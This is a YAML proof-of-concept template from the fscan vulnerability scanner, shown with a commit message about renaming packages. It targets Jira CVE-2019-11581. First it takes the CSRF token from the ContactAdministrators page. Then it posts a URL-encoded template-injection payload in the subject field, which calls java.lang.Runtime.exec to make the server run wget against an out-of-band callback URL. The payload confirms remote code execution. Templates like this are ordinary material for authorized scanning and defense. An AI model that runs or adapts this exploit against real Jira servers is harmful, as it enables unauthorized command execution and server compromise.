fscan/webscan/pocs/jira-cve-2019-11581.yml
ZacharyZcR c2b63a57e2 refactor: 修正包命名规范并修复编译问题
- 重命名 Common -> common,WebScan -> webscan,遵循 Go 包命名约定
- 修复模块路径大小写不匹配导致的编译错误
- 清理依赖项,优化 go.mod 文件
- 添加 Docker 测试环境配置文件
- 新增镜像拉取脚本以处理网络超时问题
- 成功编译生成 fscan v2.2.1 可执行文件

该修复解决了 Linux 系统下包名大小写敏感导致的模块解析失败问题。
2025-09-01 22:41:54 +00:00

24 lines
1009 B
YAML

name: poc-yaml-jira-cve-2019-11581
set:
reverse: newReverse()
reverseUrl: reverse.url
rules:
- method: GET
path: /secure/ContactAdministrators!default.jspa
follow_redirects: false
expression: |
response.status == 200
search: name="atlassian-token" content="(?P<token>.+?)"
- method: POST
path: /secure/ContactAdministrators.jspa
body: >-
from=admin%40163.com&subject=%24i18n.getClass%28%29.forName%28%27java.lang.Runtime%27%29.getMethod%28%27getRuntime%27%2Cnull%29.invoke%28null%2Cnull%29.exec%28%27wget+{{reverseUrl}}+%27%29.waitFor%28%29&details=exange%20website%20links&atl_token={{token}}&%E5%8F%91%E9%80%81=%E5%8F%91%E9%80%81
follow_redirects: false
expression: |
response.status == 302 && reverse.wait(5)
detail:
author: harris2015(https://github.com/harris2015)
Affected Version: "cve-2019-11581"
links:
- https://confluence.atlassian.com/jira/jira-security-advisory-2019-07-10-973486595.html